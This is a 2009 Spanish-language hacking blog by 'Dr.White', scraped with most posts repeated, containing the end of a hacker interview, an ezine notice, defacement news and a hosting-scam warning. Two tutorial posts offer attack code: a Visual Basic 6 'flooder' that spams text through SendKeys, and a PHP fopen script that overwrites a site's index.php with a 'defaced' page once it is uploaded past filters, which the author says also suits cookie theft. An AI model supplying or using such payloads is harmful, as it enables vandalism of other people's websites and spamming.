52.-¿Te consideras un chico normal? si, no ¿y porque?
- Si me considero nomal.
53.-¿Consideras que para ser hacker debes tener un intelecto mayor a la media ó cualquiera que se lo proponga puede serlo?
- Cualquiera que lo proponga que tenga ingenio e imaginación.
54.-¿Has utilizado el ser hacker para ganarte un lugar entre tu circulo social u obtener algun beneficio personal?
- Si y no me molesta decirlo ya que uno no solo debe aprender a entrar a sistemas para sentarse en una silla y solo trabajar
y no soy hacker.
55.-¿Eres timido ó extrovertido?
- Depende de la situación.
56.-¿Que programas de television te gusta ver, cuando estas en tus ratos de ocio?
- no veo mucha tele pero
57.-¿tienes novia?
- No no me gusta sentirme precionado ante una sola mujer excepto que cumpla con mis necesidades de todo tipo.
58.-En en caso que la pregunta anterior sea si, es dificil que nuestra pareja comprenda nuestra adicción a la informatica, ¿Tu como manejas esa situacion?... Yo en mi caso le propongo ir a bailar despues de terminar lo que yo este haciendo en el PC jeje.
- Cuando tenía ella me decía que deje el hack y eso.
59.-Todos tenemos metas por cumplir a corto y mediano plazo, ¿cuales son las tuyas ?
- Ser Asesor en Seguridad Informática, tener una empresa de consultoría y hacer crecer mi blog.
60.-¿Que te gusta leer?
- Libros de Terror y de Seguridad Informatica; Tambien me gusta en particular paulo coelho.
61.-¿Que opina tu familia sobre tu vocacion y dedicacion a la seguridad informatica?
- Que está muy bien pero a veces no me siento apoyado por parte de algunos miembros en particular.
62.-¿Repercute tu dedicacion a esta profesion, en en el rendimiento escolar? ó ¿eres un buen estudiante?
- Malo estudiante, es curioso mi I.Q es superior al normal pero parece que lo que interpreta mi cerebro es la programación
63.-¿como es un fin de samana ya sea sabado o domingo de Dédalo?
- Pues Actualizo el Blog luego en las tardes salgo con mi padre pues es con quien vivo y en las noches salgo con mis amigos
64.-¿Algun consejo que nos pudieras dar a los que iniciamos en este rollo (seguridad informatica)?
- Nunca Se rindan brothers este mundo es muy chevere y es cuestion de imaginación.
65.-¿Alguna otra cosa que te gustaria agregar ó compartir a los que leamos esta entrevista.?
- Quisiera solo Dar Agradecimientos a las personas que me han apoyado en este medio:

@Jbyte
@Perverthso
@Dr.Ne0x
@D4rkD3m0n
@BackTracker
@Chelano
@Walter Cuestas
@Syntex
@Segio Buenaventura
@Vit0y4
@Mi papá
@Ricardo Salazar
@Mi Familia
@Amigos del Cole
@Martin Leyton
@Succeded
@Pr@fes0r_X

Y todo Seguridad Blanca y XtremFiles...

============================================


Yuset Gracias Por la Entrevista.


Saludos
Dr.White

jueves, 15 de octubre de 2009

DragonJAR Ezine #4



E-Zine de DragonJAR Nº4 está buenisima la recomiendo...

# provechando WebMin
# Base64 en lapiz papel y calculadora
# Columna de Opinion
# Analisis Basico de Malware
# Campus Party 2009
# ISO 27001 una Vision General

Descargar de Aquí


Mas Info:

Click Aquí


Saludos
Dr.White

DragonJAR Ezine #4



E-Zine de DragonJAR Nº4 está buenisima la recomiendo...

# provechando WebMin
# Base64 en lapiz papel y calculadora
# Columna de Opinion
# Analisis Basico de Malware
# Campus Party 2009
# ISO 27001 una Vision General

Descargar de Aquí


Mas Info:

Click Aquí


Saludos
Dr.White

miércoles, 14 de octubre de 2009

Haciendo un Flooder con Visual Basic

Hoy quería enseñar un poco el tema de los sendkeys para quien sabe jaja uso personal... y pues que mejor manera que empesar con un flooder...


Bueno primero que todo habran su visual basic 6 y pongan lo siguiente:

Private Declare Function GetKeyPress Lib "user32" Alias "GetAsyncKeyState" (ByVal key As Long) As Integer

no hagan caso al code jaja solo ponganlo...


ahora pues les voy a enseñar la parte importante... vamos a poner en el form un timer y vamos a poner en el form_load lo siguiente:

Timer1.Interval = "100"

tambien lo pueden hacer desde las propiedades del timer si gustan...

Ahora dentro del Timer1_Timer pondrán:

If GetKeyPress(vbKeyF1) Then
SendKeys (Text1.Text) + ("{enter}")
End If

y ya tenemos listo casi todo...

con este code al apretar F1 pues haran que envie multiples veces lo que tengan escrito en el textbox1, ustedes lo pueden cambiar, puede ser control alt lo que quieran solo investiguen un poco mas del tema y podrán hacer maravillas...



Saludos
Dr.White

Haciendo un Flooder con Visual Basic

Hoy quería enseñar un poco el tema de los sendkeys para quien sabe jaja uso personal... y pues que mejor manera que empesar con un flooder...


Bueno primero que todo habran su visual basic 6 y pongan lo siguiente:

Private Declare Function GetKeyPress Lib "user32" Alias "GetAsyncKeyState" (ByVal key As Long) As Integer

no hagan caso al code jaja solo ponganlo...


ahora pues les voy a enseñar la parte importante... vamos a poner en el form un timer y vamos a poner en el form_load lo siguiente:

Timer1.Interval = "100"

tambien lo pueden hacer desde las propiedades del timer si gustan...

Ahora dentro del Timer1_Timer pondrán:

If GetKeyPress(vbKeyF1) Then
SendKeys (Text1.Text) + ("{enter}")
End If

y ya tenemos listo casi todo...

con este code al apretar F1 pues haran que envie multiples veces lo que tengan escrito en el textbox1, ustedes lo pueden cambiar, puede ser control alt lo que quieran solo investiguen un poco mas del tema y podrán hacer maravillas...



Saludos
Dr.White

martes, 13 de octubre de 2009

Escribiendo Archivos con Fopen

Esto lo escribo ya que es muy util para el momento en el que ingresamos a páginas con upload de archivos... como dice el titulo vamos a escribir archivos con php de tal manera que podamos cambiar algo, puede ser el index en el caso de que alguien malo lo quiera hacer, como este es un blog en el que nos ponemos del lado del mal pues lo haremos para cambiar el index... a ver digamos que estamos en un upload de archivos la pagina tiene un filemanager o un upload de archivos que tiene filtrado para no poner un nuevo index... pensando que el admin es bueno en seguridad, vamos a abrir un blog de notas e ingresaremos las siguientes lineas de code...


<?php

$fp = fopen("../index.php", "w");

$tuindex = "\n<center> <h1>defaced</h1></center>";

$write = fputs($fp, $tuindex);

fclose($fp);

?>



listo ahora solo faltaría ir a la ruta del archivo y actualizar el index.php de todos modos pues este tema no solo se puede usar para cambiar index sino para robo de cookies o quizas para saber quienes entran a tu web y mantener un control... o estadisticas...

ojo ustedes tienen que cambiar el ../ por la cantidad de directorios que necesiten... espero les sirva este tuto...


Saludos
Dr.White

Escribiendo Archivos con Fopen

Esto lo escribo ya que es muy util para el momento en el que ingresamos a páginas con upload de archivos... como dice el titulo vamos a escribir archivos con php de tal manera que podamos cambiar algo, puede ser el index en el caso de que alguien malo lo quiera hacer, como este es un blog en el que nos ponemos del lado del mal pues lo haremos para cambiar el index... a ver digamos que estamos en un upload de archivos la pagina tiene un filemanager o un upload de archivos que tiene filtrado para no poner un nuevo index... pensando que el admin es bueno en seguridad, vamos a abrir un blog de notas e ingresaremos las siguientes lineas de code...


<?php

$fp = fopen("../index.php", "w");

$tuindex = "\n<center> <h1>defaced</h1></center>";

$write = fputs($fp, $tuindex);

fclose($fp);

?>



listo ahora solo faltaría ir a la ruta del archivo y actualizar el index.php de todos modos pues este tema no solo se puede usar para cambiar index sino para robo de cookies o quizas para saber quienes entran a tu web y mantener un control... o estadisticas...

ojo ustedes tienen que cambiar el ../ por la cantidad de directorios que necesiten... espero les sirva este tuto...


Saludos
Dr.White

lunes, 12 de octubre de 2009

Otro Intento de DOS a Twitter o Actualizacion?

Hoy en la tarde mientras ponia para followear a la gente =) pues di con que no me salia error 503 previo de haberme salido el mensaje de que twitter esta ocupado algo asi... bueno la cosa es que esto me dejo en duda entonces lo que hice fue preguntarle por mensajes a un amigo y me dijo que le salia el error 503 y yo pense y dije mm que raro luego le dije a otro amigo y me dijo que tenia el mismo error... entonces le pregunte a una amiga que estaba ahi y twitter tambien le mandaba el 503... raro no? será mantenimiento u otro ataque?

el mensaje que me sali antes era:


Twitter is over capacity.

Too many tweets! Please wait a moment and try again.


Imagen:

Otro Intento de DOS a Twitter o Actualizacion?

Hoy en la tarde mientras ponia para followear a la gente =) pues di con que no me salia error 503 previo de haberme salido el mensaje de que twitter esta ocupado algo asi... bueno la cosa es que esto me dejo en duda entonces lo que hice fue preguntarle por mensajes a un amigo y me dijo que le salia el error 503 y yo pense y dije mm que raro luego le dije a otro amigo y me dijo que tenia el mismo error... entonces le pregunte a una amiga que estaba ahi y twitter tambien le mandaba el 503... raro no? será mantenimiento u otro ataque?

el mensaje que me sali antes era:


Twitter is over capacity.

Too many tweets! Please wait a moment and try again.


Imagen:

Maradona Defaced...

La web de maradona http://www.diegomaradona.com fue defaceada por hackers peruanos, segun mi criterio pues creo que se trata de una venganza por lo que le hicieron a la FPF, como dicen por ahí, Deface con Deface se paga...


imagen del deface:

Click aquí para verla...

El hacker fue Elite Peruvian por lo que puedo deducir que fueron varios, pusieron una caricatura de maradona dentro del portal como lo es esta...


cumplo con avisar...


Saludos
Dr.White

Maradona Defaced...

La web de maradona http://www.diegomaradona.com fue defaceada por hackers peruanos, segun mi criterio pues creo que se trata de una venganza por lo que le hicieron a la FPF, como dicen por ahí, Deface con Deface se paga...


imagen del deface:

Click aquí para verla...

El hacker fue Elite Peruvian por lo que puedo deducir que fueron varios, pusieron una caricatura de maradona dentro del portal como lo es esta...


cumplo con avisar...


Saludos
Dr.White

domingo, 11 de octubre de 2009

FPF Defaceada

no hay mucho que decir solo les quería avisar que un argentino cambio el index de la web http://fpf.org.pe =S nos pusieron una seleccion muy "buena" y una foto de celebración previa al partido...


Saludos
Dr.White

FPF Defaceada

no hay mucho que decir solo les quería avisar que un argentino cambio el index de la web http://fpf.org.pe =S nos pusieron una seleccion muy "buena" y una foto de celebración previa al partido...


Saludos
Dr.White

El Caso Vertig.net

Esta empresa hecha por estafadores te ofrece planes de hosting que parecen mágicos, te ofrecen hosting ilimitado dominios a precios increíbles pero en verdad no son reales los estafadores conocidos como super-sergio16 y Danixmor estafan a la gente haciendoles creer este tipo de cosas y luego de depositadas no les llega nunca el mail de confirmación, lokitox un ex miembro de xtremfiles.com tubo el placer de hacer un analisis exaustivo de como funcionaba esta estafa y como llego a los nombres de quienes lo administraban...


Aquí pueden ver el informe completo...


Saludos
Dr.White